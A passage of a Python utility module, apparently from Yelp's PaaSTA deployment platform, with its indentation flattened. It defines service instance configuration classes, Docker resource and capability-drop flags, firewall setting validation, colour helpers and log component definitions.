# DO NOT CHANGE SPACER, UNLESS YOU'RE PREPARED TO CHANGE ALL INSTANCES
# OF IT IN OTHER LIBRARIES (i.e. service_configuration_lib).
# It's used to compose a job's full ID from its name and instance
SPACER = "."
INFRA_ZK_PATH = "/nail/etc/zookeeper_discovery/infrastructure/"
PATH_TO_SYSTEM_PAASTA_CONFIG_DIR = os.environ.get(
"PAASTA_SYSTEM_CONFIG_DIR", "/etc/paasta/"
)
DEFAULT_SOA_DIR = service_configuration_lib.DEFAULT_SOA_DIR
AUTO_SOACONFIG_SUBDIR = "autotuned_defaults"
DEFAULT_DOCKERCFG_LOCATION = "file:///root/.dockercfg"
DEPLOY_PIPELINE_NON_DEPLOY_STEPS = (
"itest",
"itest-and-push-to-registry",
"security-check",
"performance-check",
"push-to-registry",
)
# Default values for _log
ANY_CLUSTER = "N/A"
ANY_INSTANCE = "N/A"
DEFAULT_LOGLEVEL = "event"
no_escape = re.compile(r"\x1B\[[0-9;]*[mK]")
# instead of the convention of using underscores in this scribe channel name,
# the audit log uses dashes to prevent collisions with a service that might be
# named 'audit_log'
AUDIT_LOG_STREAM = "stream_paasta-audit-log"
DEFAULT_SYNAPSE_HAPROXY_URL_FORMAT = (
"http://{host:s}:{port:d}/;csv;norefresh;scope={scope:s}"
)
DEFAULT_CPU_PERIOD = 100000
DEFAULT_CPU_BURST_ADD = 1
DEFAULT_SOA_CONFIGS_GIT_URL = "sysgit.yelpcorp.com"
log = logging.getLogger(__name__)
log.addHandler(logging.NullHandler())
INSTANCE_TYPES = (
"marathon",
"paasta_native",
"adhoc",
"kubernetes",
"tron",
"flink",
"cassandracluster",
"kafkacluster",
"monkrelays",
"nrtsearchservice",
)
INSTANCE_TYPE_TO_K8S_NAMESPACE = {
"marathon": "paasta",
"adhoc": "paasta",
"kubernetes": "paasta",
"tron": "tron",
"flink": "paasta-flinks",
"cassandracluster": "paasta-cassandraclusters",
"kafkacluster": "paasta-kafkaclusters",
"nrtsearchservice": "paasta-nrtsearchservices",
}
CAPS_DROP = [
"SETPCAP",
"MKNOD",
"AUDIT_WRITE",
"CHOWN",
"NET_RAW",
"DAC_OVERRIDE",
"FOWNER",
"FSETID",
"KILL",
"SETGID",
"SETUID",
"NET_BIND_SERVICE",
"SYS_CHROOT",
"SETFCAP",
]
class RollbackTypes(Enum):
AUTOMATIC_SLO_ROLLBACK = "automatic_slo_rollback"
USER_INITIATED_ROLLBACK = "user_initiated_rollback"
class TimeCacheEntry(TypedDict):
data: Any
fetch_time: float
_CacheRetT = TypeVar("_CacheRetT")
class time_cache:
def __init__(self, ttl: float = 0) -> None:
self.configs: Dict[Tuple, TimeCacheEntry] = {}
self.ttl = ttl
def __call__(self, f: Callable[..., _CacheRetT]) -> Callable[..., _CacheRetT]:
def cache(*args: Any, **kwargs: Any) -> _CacheRetT:
if "ttl" in kwargs:
ttl = kwargs["ttl"]
del kwargs["ttl"]
else:
ttl = self.ttl
key = args
for item in kwargs.items():
key += item
if (
(not ttl)
or (key not in self.configs)
or (time.time() - self.configs[key]["fetch_time"] > ttl)
):
self.configs[key] = {
"data": f(*args, **kwargs),
"fetch_time": time.time(),
}
return self.configs[key]["data"]
return cache
_SortDictsT = TypeVar("_SortDictsT", bound=Mapping)
def sort_dicts(dcts: Iterable[_SortDictsT]) -> List[_SortDictsT]:
def key(dct: _SortDictsT) -> Tuple:
return tuple(sorted(dct.items()))
return sorted(dcts, key=key)
class InvalidInstanceConfig(Exception):
pass
DeployBlacklist = List[Tuple[str, str]]
DeployWhitelist = Optional[Tuple[str, List[str]]]
# The actual config files will have lists, since tuples are not expressible in base YAML, so we define different types
# here to represent that. The getter functions will convert to the safe versions above.
UnsafeDeployBlacklist = Optional[Sequence[Sequence[str]]]
UnsafeDeployWhitelist = Optional[Sequence[Union[str, Sequence[str]]]]
Constraint = Sequence[str]
# e.g. ['GROUP_BY', 'habitat', 2]. Marathon doesn't like that so we'll convert to Constraint later.
UnstringifiedConstraint = Sequence[Union[str, int, float]]
SecurityConfigDict = Dict # Todo: define me.
class VolumeWithMode(TypedDict):
mode: str
class DockerVolume(VolumeWithMode):
hostPath: str
containerPath: str
class AwsEbsVolume(VolumeWithMode):
volume_id: str
fs_type: str
partition: int
container_path: str
class PersistentVolume(VolumeWithMode):
size: int
container_path: str
storage_class_name: str
class SecretVolumeItem(TypedDict, total=False):
key: str
path: str
mode: Union[str, int]
class SecretVolume(TypedDict, total=False):
secret_name: str
container_path: str
default_mode: Union[str, int]
items: List[SecretVolumeItem]
class MonitoringDict(TypedDict, total=False):
alert_after: Union[str, float]
check_every: str
check_oom_events: bool
component: str
description: str
notification_email: Union[str, bool]
page: bool
priority: str
project: str
realert_every: float
runbook: str
slack_channels: Union[str, List[str]]
tags: List[str]
team: str
ticket: bool
tip: str
class InstanceConfigDict(TypedDict, total=False):
deploy_group: str
mem: float
cpus: float
disk: float
cmd: str
args: List[str]
cfs_period_us: float
cpu_burst_add: float
cap_add: List
env: Dict[str, str]
monitoring: MonitoringDict
deploy_blacklist: UnsafeDeployBlacklist
deploy_whitelist: UnsafeDeployWhitelist
pool: str
persistent_volumes: List[PersistentVolume]
role: str
extra_volumes: List[DockerVolume]
aws_ebs_volumes: List[AwsEbsVolume]
secret_volumes: List[SecretVolume]
security: SecurityConfigDict
dependencies_reference: str
dependencies: Dict[str, Dict]
constraints: List[UnstringifiedConstraint]
extra_constraints: List[UnstringifiedConstraint]
net: str
extra_docker_args: Dict[str, str]
gpus: int
branch: str
iam_role: str
iam_role_provider: str
class BranchDictV1(TypedDict, total=False):
docker_image: str
desired_state: str
force_bounce: Optional[str]
class BranchDictV2(TypedDict):
git_sha: str
docker_image: str
desired_state: str
force_bounce: Optional[str]
class DockerParameter(TypedDict):
key: str
value: str
def safe_deploy_blacklist(input: UnsafeDeployBlacklist) -> DeployBlacklist:
return [(t, l) for t, l in input]
def safe_deploy_whitelist(input: UnsafeDeployWhitelist) -> DeployWhitelist:
try:
location_type, allowed_values = input
return cast(str, location_type), cast(List[str], allowed_values)
except TypeError:
return None
# For mypy typing
InstanceConfig_T = TypeVar("InstanceConfig_T", bound="InstanceConfig")
class InstanceConfig:
config_filename_prefix: str
def __init__(
self,
cluster: str,
instance: str,
service: str,
config_dict: InstanceConfigDict,
branch_dict: Optional[BranchDictV2],
soa_dir: str = DEFAULT_SOA_DIR,
) -> None:
self.config_dict = config_dict
self.branch_dict = branch_dict
self.cluster = cluster
self.instance = instance
self.service = service
self.soa_dir = soa_dir
self._job_id = compose_job_id(service, instance)
config_interpolation_keys = ("deploy_group",)
interpolation_facts = self.__get_interpolation_facts()
for key in config_interpolation_keys:
if (
key in self.config_dict
and self.config_dict[key] is not None # type: ignore
):
self.config_dict[key] = self.config_dict[key].format( # type: ignore
**interpolation_facts
)
def __repr__(self) -> str:
return "{!s}({!r}, {!r}, {!r}, {!r}, {!r}, {!r})".format(
self.__class__.__name__,
self.service,
self.instance,
self.cluster,
self.config_dict,
self.branch_dict,
self.soa_dir,
)
def __get_interpolation_facts(self) -> Dict[str, str]:
return {
"cluster": self.cluster,
"instance": self.instance,
"service": self.service,
}
def get_cluster(self) -> str:
return self.cluster
def get_instance(self) -> str:
return self.instance
def get_service(self) -> str:
return self.service
@property
def job_id(self) -> str:
return self._job_id
def get_docker_registry(
self, system_paasta_config: Optional["SystemPaastaConfig"] = None
) -> str:
return get_service_docker_registry(
self.service, self.soa_dir, system_config=system_paasta_config
)
def get_branch(self) -> str:
return get_paasta_branch(
cluster=self.get_cluster(), instance=self.get_instance()
)
def get_deploy_group(self) -> str:
return self.config_dict.get("deploy_group", self.get_branch())
def get_team(self) -> str:
return self.config_dict.get("monitoring", {}).get("team", None)
def get_mem(self) -> float:
"""Gets the memory required from the service's configuration.
Defaults to 4096 (4G) if no value specified in the config.
:returns: The amount of memory specified by the config, 4096 if not specified"""
mem = self.config_dict.get("mem", 4096)
return mem
def get_mem_swap(self) -> str:
"""Gets the memory-swap value. This value is passed to the docker
container to ensure that the total memory limit (memory + swap) is the
same value as the 'mem' key in soa-configs. Note - this value *has* to
be >= to the mem key, so we always round up to the closest MB and add
additional 64MB for the docker executor (See PAASTA-12450).
"""
mem = self.get_mem()
mem_swap = int(math.ceil(mem + 64))
return "%sm" % mem_swap
def get_cpus(self) -> float:
"""Gets the number of cpus required from the service's configuration.
Defaults to 1 cpu if no value specified in the config.
:returns: The number of cpus specified in the config, 1 if not specified"""
cpus = self.config_dict.get("cpus", 1)
return cpus
def get_cpu_burst_add(self) -> float:
"""Returns the number of additional cpus a container is allowed to use.
Defaults to DEFAULT_CPU_BURST_ADD"""
return self.config_dict.get("cpu_burst_add", DEFAULT_CPU_BURST_ADD)
def get_cpu_period(self) -> float:
"""The --cpu-period option to be passed to docker
Comes from the cfs_period_us configuration option
:returns: The number to be passed to the --cpu-period docker flag"""
return self.config_dict.get("cfs_period_us", DEFAULT_CPU_PERIOD)
def get_cpu_quota(self) -> float:
"""Gets the --cpu-quota option to be passed to docker
Calculation: (cpus + cpus_burst_add) * cfs_period_us
:returns: The number to be passed to the --cpu-quota docker flag"""
cpu_burst_add = self.get_cpu_burst_add()
return (self.get_cpus() + cpu_burst_add) * self.get_cpu_period()
def get_extra_docker_args(self) -> Dict[str, str]:
return self.config_dict.get("extra_docker_args", {})
def get_cap_add(self) -> Iterable[DockerParameter]:
"""Get the --cap-add options to be passed to docker
Generated from the cap_add configuration option, which is a list of
capabilities.
Example configuration: {'cap_add': ['IPC_LOCK', 'SYS_PTRACE']}
:returns: A generator of cap_add options to be passed as --cap-add flags"""
for value in self.config_dict.get("cap_add", []):
yield {"key": "cap-add", "value": f"{value}"}
def get_cap_drop(self) -> Iterable[DockerParameter]:
"""Generates --cap-drop options to be passed to docker by default, which
makes them not able to perform special privilege escalation stuff
https://docs.docker.com/engine/reference/run/#runtime-privilege-and-linux-capabilities
"""
for cap in CAPS_DROP:
yield {"key": "cap-drop", "value": cap}
def format_docker_parameters(
self,
with_labels: bool = True,
system_paasta_config: Optional["SystemPaastaConfig"] = None,
) -> List[DockerParameter]:
"""Formats extra flags for running docker. Will be added in the format
`["--%s=%s" % (e['key'], e['value']) for e in list]` to the `docker run` command
Note: values must be strings
:param with_labels: Whether to build docker parameters with or without labels
:returns: A list of parameters to be added to docker run"""
parameters: List[DockerParameter] = [
{"key": "memory-swap", "value": self.get_mem_swap()},
{"key": "cpu-period", "value": "%s" % int(self.get_cpu_period())},
{"key": "cpu-quota", "value": "%s" % int(self.get_cpu_quota())},
]
if self.use_docker_disk_quota(system_paasta_config=system_paasta_config):
parameters.append(
{
"key": "storage-opt",
"value": f"size={int(self.get_disk() * 1024 * 1024)}",
}
)
if with_labels:
parameters.extend(
[
{"key": "label", "value": "paasta_service=%s" % self.service},
{"key": "label", "value": "paasta_instance=%s" % self.instance},
]
)
extra_docker_args = self.get_extra_docker_args()
if extra_docker_args:
for key, value in extra_docker_args.items():
parameters.extend([{"key": key, "value": value}])
parameters.extend(self.get_cap_add())
parameters.extend(self.get_docker_init())
parameters.extend(self.get_cap_drop())
return parameters
def use_docker_disk_quota(
self, system_paasta_config: Optional["SystemPaastaConfig"] = None
) -> bool:
if system_paasta_config is None:
system_paasta_config = load_system_paasta_config()
return system_paasta_config.get_enforce_disk_quota()
def get_docker_init(self) -> Iterable[DockerParameter]:
return [{"key": "init", "value": "true"}]
def get_disk(self, default: float = 1024) -> float:
"""Gets the amount of disk space in MiB required from the service's configuration.
Defaults to 1024 (1GiB) if no value is specified in the config.
:returns: The amount of disk space specified by the config, 1024 MiB if not specified"""
disk = self.config_dict.get("disk", default)
return disk
def get_gpus(self) -> Optional[int]:
"""Gets the number of gpus required from the service's configuration.
Default to None if no value is specified in the config.
:returns: The number of gpus specified by the config, 0 if not specified"""
gpus = self.config_dict.get("gpus", None)
return gpus
def get_container_type(self) -> Optional[str]:
"""Get Mesos containerizer type.
Default to DOCKER if gpus are not used.
:returns: Mesos containerizer type, DOCKER or MESOS"""
if self.get_gpus() is not None:
container_type = "MESOS"
else:
container_type = "DOCKER"
return container_type
def get_cmd(self) -> Optional[Union[str, List[str]]]:
"""Get the docker cmd specified in the service's configuration.
Defaults to None if not specified in the config.
:returns: A string specified in the config, None if not specified"""
return self.config_dict.get("cmd", None)
def get_instance_type(self) -> Optional[str]:
return getattr(self, "config_filename_prefix", None)
def get_env_dictionary(
self, system_paasta_config: Optional["SystemPaastaConfig"] = None
) -> Dict[str, str]:
"""A dictionary of key/value pairs that represent environment variables
to be injected to the container environment"""
env = {
"PAASTA_SERVICE": self.service,
"PAASTA_INSTANCE": self.instance,
"PAASTA_CLUSTER": self.cluster,
"PAASTA_DEPLOY_GROUP": self.get_deploy_group(),
"PAASTA_DOCKER_IMAGE": self.get_docker_image(),
"PAASTA_RESOURCE_CPUS": str(self.get_cpus()),
"PAASTA_RESOURCE_MEM": str(self.get_mem()),
"PAASTA_RESOURCE_DISK": str(self.get_disk()),
}
if self.get_gpus() is not None:
env["PAASTA_RESOURCE_GPUS"] = str(self.get_gpus())
try:
env["PAASTA_GIT_SHA"] = get_git_sha_from_dockerurl(
self.get_docker_url(system_paasta_config=system_paasta_config)
)
except Exception:
pass
team = self.get_team()
if team:
env["PAASTA_MONITORING_TEAM"] = team
instance_type = self.get_instance_type()
if instance_type:
env["PAASTA_INSTANCE_TYPE"] = instance_type
user_env = self.config_dict.get("env", {})
env.update(user_env)
return {str(k): str(v) for (k, v) in env.items()}
def get_env(
self, system_paasta_config: Optional["SystemPaastaConfig"] = None
) -> Dict[str, str]:
"""Basic get_env that simply returns the basic env, other classes
might need to override this getter for more implementation-specific
env getting"""
return self.get_env_dictionary(system_paasta_config=system_paasta_config)
def get_args(self) -> Optional[List[str]]:
"""Get the docker args specified in the service's configuration.
If not specified in the config and if cmd is not specified, defaults to an empty array.
If not specified in the config but cmd is specified, defaults to null.
If specified in the config and if cmd is also specified, throws an exception. Only one may be specified.
:param service_config: The service instance's configuration dictionary
:returns: An array of args specified in the config,
``[]`` if not specified and if cmd is not specified,
otherwise None if not specified but cmd is specified"""
if self.get_cmd() is None:
return self.config_dict.get("args", [])
else:
args = self.config_dict.get("args", None)
if args is None:
return args
else:
# TODO validation stuff like this should be moved into a check_*
raise InvalidInstanceConfig(
"Instance configuration can specify cmd or args, but not both."
)
def get_monitoring(self) -> MonitoringDict:
"""Get monitoring overrides defined for the given instance"""
return self.config_dict.get("monitoring", {})
def get_deploy_constraints(
self,
blacklist: DeployBlacklist,
whitelist: DeployWhitelist,
system_deploy_blacklist: DeployBlacklist,
system_deploy_whitelist: DeployWhitelist,
) -> List[Constraint]:
"""Return the combination of deploy_blacklist and deploy_whitelist
as a list of constraints.
"""
return (
deploy_blacklist_to_constraints(blacklist)
+ deploy_whitelist_to_constraints(whitelist)
+ deploy_blacklist_to_constraints(system_deploy_blacklist)
+ deploy_whitelist_to_constraints(system_deploy_whitelist)
)
def get_deploy_blacklist(self) -> DeployBlacklist:
"""The deploy blacklist is a list of lists, where the lists indicate
which locations the service should not be deployed"""
return safe_deploy_blacklist(self.config_dict.get("deploy_blacklist", []))
def get_deploy_whitelist(self) -> DeployWhitelist:
"""The deploy whitelist is a tuple of (location_type, [allowed value, allowed value, ...]).
To have tasks scheduled on it, a host must be covered by the deploy whitelist (if present) and not excluded by
the deploy blacklist."""
return safe_deploy_whitelist(self.config_dict.get("deploy_whitelist"))
def get_docker_image(self) -> str:
"""Get the docker image name (with tag) for a given service branch from
a generated deployments.json file."""
if self.branch_dict is not None:
return self.branch_dict["docker_image"]
else:
return ""
def get_docker_url(
self, system_paasta_config: Optional["SystemPaastaConfig"] = None
) -> str:
"""Compose the docker url.
:returns: '<registry_uri>/<docker_image>'
"""
registry_uri = self.get_docker_registry(
system_paasta_config=system_paasta_config
)
docker_image = self.get_docker_image()
if not docker_image:
raise NoDockerImageError(
"Docker url not available because there is no docker_image"
)
docker_url = f"{registry_uri}/{docker_image}"
return docker_url
def get_desired_state(self) -> str:
"""Get the desired state (either 'start' or 'stop') for a given service
branch from a generated deployments.json file."""
if self.branch_dict is not None:
return self.branch_dict["desired_state"]
else:
return "start"
def get_force_bounce(self) -> Optional[str]:
"""Get the force_bounce token for a given service branch from a generated
deployments.json file. This is a token that, when changed, indicates that
the instance should be recreated and bounced, even if no other
parameters have changed. This may be None or a string, generally a
timestamp.
"""
if self.branch_dict is not None:
return self.branch_dict["force_bounce"]
else:
return None
def check_cpus(self) -> Tuple[bool, str]:
cpus = self.get_cpus()
if cpus is not None:
if not isinstance(cpus, (float, int)):
return (
False,
'The specified cpus value "%s" is not a valid float or int.' % cpus,
)
return True, ""
def check_mem(self) -> Tuple[bool, str]:
mem = self.get_mem()
if mem is not None:
if not isinstance(mem, (float, int)):
return (
False,
'The specified mem value "%s" is not a valid float or int.' % mem,
)
return True, ""
def check_disk(self) -> Tuple[bool, str]:
disk = self.get_disk()
if disk is not None:
if not isinstance(disk, (float, int)):
return (
False,
'The specified disk value "%s" is not a valid float or int.' % disk,
)
return True, ""
def check_security(self) -> Tuple[bool, str]:
security = self.config_dict.get("security")
if security is None:
return True, ""
inbound_firewall = security.get("inbound_firewall")
outbound_firewall = security.get("outbound_firewall")
if inbound_firewall is None and outbound_firewall is None:
return True, ""
if inbound_firewall is not None and inbound_firewall not in (
"allow",
"reject",
):
return (
False,
'Unrecognized inbound_firewall value "%s"' % inbound_firewall,
)
if outbound_firewall is not None and outbound_firewall not in (
"block",
"monitor",
):
return (
False,
'Unrecognized outbound_firewall value "%s"' % outbound_firewall,
)
unknown_keys = set(security.keys()) - {
"inbound_firewall",
"outbound_firewall",
}
if unknown_keys:
return (
False,
'Unrecognized items in security dict of service config: "%s"'
% ",".join(unknown_keys),
)
return True, ""
def check_dependencies_reference(self) -> Tuple[bool, str]:
dependencies_reference = self.config_dict.get("dependencies_reference")
if dependencies_reference is None:
return True, ""
dependencies = self.config_dict.get("dependencies")
if dependencies is None:
return (
False,
'dependencies_reference "%s" declared but no dependencies found'
% dependencies_reference,
)
if dependencies_reference not in dependencies:
return (
False,
'dependencies_reference "%s" not found in dependencies dictionary'
% dependencies_reference,
)
return True, ""
def check(self, param: str) -> Tuple[bool, str]:
check_methods = {
"cpus": self.check_cpus,
"mem": self.check_mem,
"security": self.check_security,
"dependencies_reference": self.check_dependencies_reference,
"deploy_group": self.check_deploy_group,
}
check_method = check_methods.get(param)
if check_method is not None:
return check_method()
else:
return (
False,
'Your service config specifies "%s", an unsupported parameter.' % param,
)
def validate(self, params: Optional[List[str]] = None,) -> List[str]:
if params is None:
params = [
"cpus",
"mem",
"security",
"dependencies_reference",
"deploy_group",
]
error_msgs = []
for param in params:
check_passed, check_msg = self.check(param)
if not check_passed:
error_msgs.append(check_msg)
return error_msgs
def check_deploy_group(self) -> Tuple[bool, str]:
deploy_group = self.get_deploy_group()
if deploy_group is not None:
pipeline_deploy_groups = get_pipeline_deploy_groups(
service=self.service, soa_dir=self.soa_dir
)
if deploy_group not in pipeline_deploy_groups:
return (
False,
f"{self.service}.{self.instance} uses deploy_group {deploy_group}, but it is not deploy.yaml",
) # noqa: E501
return True, ""
def get_extra_volumes(self) -> List[DockerVolume]:
"""Extra volumes are a specially formatted list of dictionaries that should
be bind mounted in a container The format of the dictionaries should
conform to the `Mesos container volumes spec
<https://mesosphere.github.io/marathon/docs/native-docker.html>`_"""
return self.config_dict.get("extra_volumes", [])
def get_aws_ebs_volumes(self) -> List[AwsEbsVolume]:
return self.config_dict.get("aws_ebs_volumes", [])
def get_secret_volumes(self) -> List[SecretVolume]:
return self.config_dict.get("secret_volumes", [])
def get_iam_role(self) -> str:
return self.config_dict.get("iam_role", "")
def get_iam_role_provider(self) -> str:
return self.config_dict.get("iam_role_provider", "kiam")
def get_role(self) -> Optional[str]:
"""Which mesos role of nodes this job should run on.
"""
return self.config_dict.get("role")
def get_pool(self) -> str:
"""Which pool of nodes this job should run on. This can be used to mitigate noisy neighbors, by putting
particularly noisy or noise-sensitive jobs into different pools.
This is implemented with an attribute "pool" on each mesos slave and by adding a constraint or node selector.
Eventually this may be implemented with Mesos roles, once a framework can register under multiple roles.
:returns: the "pool" attribute in your config dict, or the string "default" if not specified."""
return self.config_dict.get("pool", "default")
def get_pool_constraints(self) -> List[Constraint]:
pool = self.get_pool()
return [["pool", "LIKE", pool]]
def get_constraints(self) -> Optional[List[Constraint]]:
return stringify_constraints(self.config_dict.get("constraints", None))
def get_extra_constraints(self) -> List[Constraint]:
return stringify_constraints(self.config_dict.get("extra_constraints", []))
def get_net(self) -> str:
"""
:returns: the docker networking mode the container should be started with.
"""
return self.config_dict.get("net", "bridge")
def get_volumes(self, system_volumes: Sequence[DockerVolume]) -> List[DockerVolume]:
volumes = list(system_volumes) + list(self.get_extra_volumes())
return _reorder_docker_volumes(volumes)
def get_persistent_volumes(self) -> Sequence[PersistentVolume]:
return self.config_dict.get("persistent_volumes", [])
def get_dependencies_reference(self) -> Optional[str]:
"""Get the reference to an entry in dependencies.yaml
Defaults to None if not specified in the config.
:returns: A string specified in the config, None if not specified"""
return self.config_dict.get("dependencies_reference")
def get_dependencies(self) -> Optional[Dict]:
"""Get the contents of the dependencies_dict pointed to by the dependency_reference or
'main' if no dependency_reference exists
Defaults to None if not specified in the config.
:returns: A list of dictionaries specified in the dependencies_dict, None if not specified"""
dependencies = self.config_dict.get("dependencies")
if not dependencies:
return None
dependency_ref = self.get_dependencies_reference() or "main"
return dependencies.get(dependency_ref)
def get_inbound_firewall(self) -> Optional[str]:
"""Return 'allow', 'reject', or None as configured in security->inbound_firewall
Defaults to None if not specified in the config
Setting this to a value other than `allow` is uncommon, as doing so will restrict the
availability of your service. The only other supported value is `reject` currently,
which will reject all remaining inbound traffic to the service port after all other rules.
This option exists primarily for sensitive services that wish to opt into this functionality.
:returns: A string specified in the config, None if not specified"""
security = self.config_dict.get("security")
if not security:
return None
return security.get("inbound_firewall")
def get_outbound_firewall(self) -> Optional[str]:
"""Return 'block', 'monitor', or None as configured in security->outbound_firewall
Defaults to None if not specified in the config
:returns: A string specified in the config, None if not specified"""
security = self.config_dict.get("security")
if not security:
return None
return security.get("outbound_firewall")
def __eq__(self, other: Any) -> bool:
if isinstance(other, type(self)):
return (
self.config_dict == other.config_dict
and self.branch_dict == other.branch_dict
and self.cluster == other.cluster
and self.instance == other.instance
and self.service == other.service
)
else:
return False
def stringify_constraint(usc: UnstringifiedConstraint) -> Constraint:
return [str(x) for x in usc]
def stringify_constraints(
uscs: Optional[List[UnstringifiedConstraint]],
) -> List[Constraint]:
if uscs is None:
return None
return [stringify_constraint(usc) for usc in uscs]
@time_cache(ttl=60)
def validate_service_instance(
service: str, instance: str, cluster: str, soa_dir: str
) -> str:
possibilities: List[str] = []
for instance_type in INSTANCE_TYPES:
sis = get_service_instance_list(
service=service,
cluster=cluster,
instance_type=instance_type,
soa_dir=soa_dir,
)
if (service, instance) in sis:
return instance_type
possibilities.extend(si[1] for si in sis)
else:
suggestions = suggest_possibilities(word=instance, possibilities=possibilities)
raise NoConfigurationForServiceError(
f"Error: {compose_job_id(service, instance)} doesn't look like it has been configured "
f"to run on the {cluster} cluster.{suggestions}"
)
_ComposeRetT = TypeVar("_ComposeRetT")
_ComposeInnerRetT = TypeVar("_ComposeInnerRetT")
def compose(
func_one: Callable[[_ComposeInnerRetT], _ComposeRetT],
func_two: Callable[..., _ComposeInnerRetT],
) -> Callable[..., _ComposeRetT]:
def composed(*args: Any, **kwargs: Any) -> _ComposeRetT:
return func_one(func_two(*args, **kwargs))
return composed
class PaastaColors:
"""Collection of static variables and methods to assist in coloring text."""
# ANSI color codes
BLUE = "\033[34m"
BOLD = "\033[1m"
CYAN = "\033[36m"
DEFAULT = "\033[0m"
GREEN = "\033[32m"
GREY = "\033[38;5;242m"
MAGENTA = "\033[35m"
RED = "\033[31m"
YELLOW = "\033[33m"
@staticmethod
def bold(text: str) -> str:
"""Return bolded text.
:param text: a string
:return: text color coded with ANSI bold
"""
return PaastaColors.color_text(PaastaColors.BOLD, text)
@staticmethod
def blue(text: str) -> str:
"""Return text that can be printed blue.
:param text: a string
:return: text color coded with ANSI blue
"""
return PaastaColors.color_text(PaastaColors.BLUE, text)
@staticmethod
def green(text: str) -> str:
"""Return text that can be printed green.
:param text: a string
:return: text color coded with ANSI green"""
return PaastaColors.color_text(PaastaColors.GREEN, text)
@staticmethod
def red(text: str) -> str:
"""Return text that can be printed red.
:param text: a string
:return: text color coded with ANSI red"""
return PaastaColors.color_text(PaastaColors.RED, text)
@staticmethod
def magenta(text: str) -> str:
"""Return text that can be printed magenta.
:param text: a string
:return: text color coded with ANSI magenta"""
return PaastaColors.color_text(PaastaColors.MAGENTA, text)
@staticmethod
def color_text(color: str, text: str) -> str:
"""Return text that can be printed color.
:param color: ANSI color code
:param text: a string
:return: a string with ANSI color encoding"""
# any time text returns to default, we want to insert our color.
replaced = text.replace(PaastaColors.DEFAULT, PaastaColors.DEFAULT + color)
# then wrap the beginning and end in our color/default.
return color + replaced + PaastaColors.DEFAULT
@staticmethod
def cyan(text: str) -> str:
"""Return text that can be printed cyan.
:param text: a string
:return: text color coded with ANSI cyan"""
return PaastaColors.color_text(PaastaColors.CYAN, text)
@staticmethod
def yellow(text: str) -> str:
"""Return text that can be printed yellow.
:param text: a string
:return: text color coded with ANSI yellow"""
return PaastaColors.color_text(PaastaColors.YELLOW, text)
@staticmethod
def grey(text: str) -> str:
return PaastaColors.color_text(PaastaColors.GREY, text)
@staticmethod
def default(text: str) -> str:
return PaastaColors.color_text(PaastaColors.DEFAULT, text)
LOG_COMPONENTS: Mapping[str, Mapping[str, Any]] = OrderedDict(
[
(
"build",
{
"color": PaastaColors.blue,
"help": (
"Logs for pre-deployment steps, such as itests, "
"image building, and security checks."
),
"source_env": "devc",
},
),
(
"deploy",
{
"color": PaastaColors.cyan,
"help": (
"Logs for deployment steps and actions, such as "
"bouncing, start/stop/restart, and instance cleanup."
),
"additional_source_envs": ["devc"],
},
),
(
"monitoring",
{
"color": PaastaColors.green,
"help": "Logs from Sensu checks for the service",
},
),
(
"marathon",
{
"color": PaastaColors.magenta,
"help": "Logs from Marathon for the service (deprecated).",
},
),
(
"app_output",
{
"color": compose(PaastaColors.yellow, PaastaColors.bold),
"help": (
"Stderr and stdout from a service's running processes. "
"Alias for both the stdout and stderr components."
),
},
),
(
"stdout",
{
"color": PaastaColors.yellow,
"help": "Stdout from a service's running processes.",
},
),
(
"stderr",
{
"color": PaastaColors.yellow,
"help": "Stderr from a service's running processes.",
},
),
(
"security",
{
"color": PaastaColors.red,
"help": "Logs from security-related services such as firewall monitoring",
},
),
("oom", {"color": PaastaColors.red, "help": "Kernel OOM events."}),
(
"task_lifecycle",
{
"color": PaastaColors.bold,
"help": "Logs that tell you about task startup, failures, healthchecks, etc.",
},
),
# I'm leaving these planned components here since they provide some hints
# about where we want to go. See PAASTA-78.
#
# But I'm commenting them out so they don't delude users into believing we
# can expose logs that we cannot actually expose. See PAASTA-927.
#
# ('app_request', {
# 'color': PaastaColors.bold,
# 'help': 'The request log for the service. Defaults to "service_NAME_requests"',
# 'command': 'scribe_reader -e ENV -f service_example_happyhour_requests',
# }),
# ('app_errors', {
# 'color': PaastaColors.red,
# 'help': 'Application error log, defaults to "stream_service_NAME_errors"',
# 'command': 'scribe_reader -e ENV -f stream_service_SERVICE_errors',
# }),
# ('lb_requests', {
# 'color': PaastaColors.bold,
# 'help': 'All requests from Smartstack haproxy',
# 'command': 'NA - TODO: SRV-1130',
# }),
# ('lb_errors', {
# 'color': PaastaColors.red,
# 'help': 'Logs from Smartstack haproxy that have 400-500 error codes',
# 'command': 'scribereader -e ENV -f stream_service_errors | grep SERVICE.instance',
# }),
]
)
class NoSuchLogComponent(Exception):
pass
def validate_log_component(component: str) -> bool:
if component in LOG_COMPONENTS.keys():
return True
else:
raise NoSuchLogComponent
def get_git_url(service: str, soa_dir: str = DEFAULT_SOA_DIR) -> str:
"""Get the git url for a service. Assumes that the service's
repo matches its name, and that it lives in services- i.e.
if this is called with the string 'test', the returned
url will be git@github.yelpcorp.com:services/test.
:param service: The service name to get a URL for
:returns: A git url to the service's repository"""
general_config = service_configuration_lib.read_service_configuration(
service, soa_dir=soa_dir
)
# TODO: PAASTA-16927: get this from system config `.git_config`
default_location = format_git_url(
"git", "github.yelpcorp.com", f"services/{service}"
)
return general_config.get("git_url", default_location)
def format_git_url(git_user: str, git_server: str, repo_name: str) -> str:
return f"{git_user}@{git_server}:{repo_name}"
def get_service_docker_registry(
service: str,
soa_dir: str = DEFAULT_SOA_DIR,
system_config: Optional["SystemPaastaConfig"] = None,
) -> str:
if service is None:
raise NotImplementedError('"None" is not a valid service')
service_configuration = service_configuration_lib.read_service_configuration(
service, soa_dir
)
try:
return service_configuration["docker_registry"]
except KeyError:
if not system_config:
system_config = load_system_paasta_config()
return system_config.get_system_docker_registry()
class NoSuchLogLevel(Exception):
pass
class LogWriterConfig(TypedDict):
driver: str
options: Dict
class LogReaderConfig(TypedDict):
driver: str
options: Dict
# The active log writer.
_log_writer = None
# The map of name -> LogWriter subclasses, used by configure_log.
_log_writer_classes = {}
class LogWriter:
def __init__(self, **kwargs: Any) -> None:
pass
def log(
self,
service: str,
line: str,
component: str,
level: str = DEFAULT_LOGLEVEL,
cluster: str = ANY_CLUSTER,
instance: str = ANY_INSTANCE,
) -> None:
raise NotImplementedError()
def log_audit(
self,
user: str,
host: str,
action: str,
action_details: dict = None,
service: str = None,
cluster: str = ANY_CLUSTER,
instance: str = ANY_INSTANCE,
) -> None:
raise NotImplementedError()
_LogWriterTypeT = TypeVar("_LogWriterTypeT", bound=Type[LogWriter])
